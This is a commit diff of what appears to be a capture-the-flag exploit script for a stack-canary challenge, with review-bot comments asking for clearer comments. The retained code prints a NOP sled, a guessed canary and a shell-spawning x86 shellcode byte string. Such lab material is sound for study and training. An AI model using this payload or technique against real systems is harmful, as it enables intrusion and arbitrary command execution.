Compare commits
1 commit
731478bcdf
...
688fdcd404
| Author | SHA1 | Date | |
|---|---|---|---|
| | 688fdcd404 | | |
1 changed files with 2 additions and 15 deletions
|
|
@ -2,20 +2,7 @@
|
||||||
|
|
||||||
# flag{CANARY_IS_ALSO_AN_ISLAND}
|
# flag{CANARY_IS_ALSO_AN_ISLAND}
|
||||||
|
|
||||||
##### Exploit Creation Steps #####
|
######### Exploit #########
|
||||||
# Step 1: Locate address of 'int stack_canaries [10]' using gdb
|
|
||||||
# Command: disas owerflow
|
|
||||||
# -> 0x56559020
|
|
||||||
##################################
|
|
||||||
# Step 2: Print all 10 possible stack canaries in gdb
|
|
||||||
# Command: x/10xw 0x56559020
|
|
||||||
##################################
|
|
||||||
# Step 3: Select only those canaries that do not contain a null byte
|
|
||||||
##################################
|
|
||||||
# Step 4: Combine Slide Rider with the selected stack canaries
|
|
||||||
##################################
|
|
||||||
|
|
||||||
############ Exploit ##############
|
|
||||||
# Step 1: Choose a random canary candidate and overwrite the buffer with 'A's, then insert the canary candidate.
|
# Step 1: Choose a random canary candidate and overwrite the buffer with 'A's, then insert the canary candidate.
|
||||||
# Note: Only canaries without null bytes can be used due to the use of strcpy.
|
# Note: Only canaries without null bytes can be used due to the use of strcpy.
|
||||||
case $(( RANDOM % 3 )) in
|
case $(( RANDOM % 3 )) in
|
||||||
|
|
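Review bot: With the "Exploit Creation Steps" comments deleted, the retained `case $(( RANDOM % 3 )) in` and the "Choose a random canary candidate" comment no longer say where the candidates come from or why there are exactly three. The strcpy note that stays explains the null-byte filter but not what is being filtered. Keep one short comment stating that the candidates are the entries of `stack_canaries` that contain no null byte, so the constant 3 can be re-checked if the binary changes.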
@ -38,4 +25,4 @@ printf "\x90%.0s" {1..2000}
|
||||||
|
|
||||||
# Step 4: Write the provided shellcode to stdout
|
# Step 4: Write the provided shellcode to stdout
|
||||||
printf "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"
|
printf "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"
|
||||||
###################################
|
###########################
|
||||||
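Review bot: The Step 4 comment above the final `printf` still describes the bytes only as "the provided shellcode", without saying who provided them or which target they are meant for, and the first hunk of this commit removes the creation notes that gave the script its context. Add a one-line comment next to the byte string naming its source (for example, the exercise material it was taken from). The shortened closing rule is a cosmetic change and needs no further action.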